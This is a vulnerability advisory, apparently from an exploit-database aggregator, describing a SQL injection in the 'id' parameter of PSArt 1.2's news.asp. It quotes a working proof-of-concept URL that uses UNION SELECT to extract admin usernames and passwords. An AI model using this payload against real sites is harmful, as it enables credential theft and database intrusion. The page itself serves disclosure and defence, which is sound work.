PSArt 1.2 Vulnerability

vendor:

PSArt

by:

Securitylab.ir

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: PSArt

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE: N/A

CPE: PSArt

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

A SQL injection vulnerability was discovered in PSArt 1.2. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'news.asp' script. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable script, which will then be executed in the backend database. This can result in the disclosure of sensitive information such as usernames and passwords.

Mitigation:

The vendor should ensure that all user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

########################## Securitylab.ir ########################
# Application Info:
# Name: PSArt
# Version: 1.2
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# http://site.com/kxfzg/news.asp?id=128%20and%201=2%20union%20select%201,username,3,4,5,6,7,password,9%20from%20admin
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################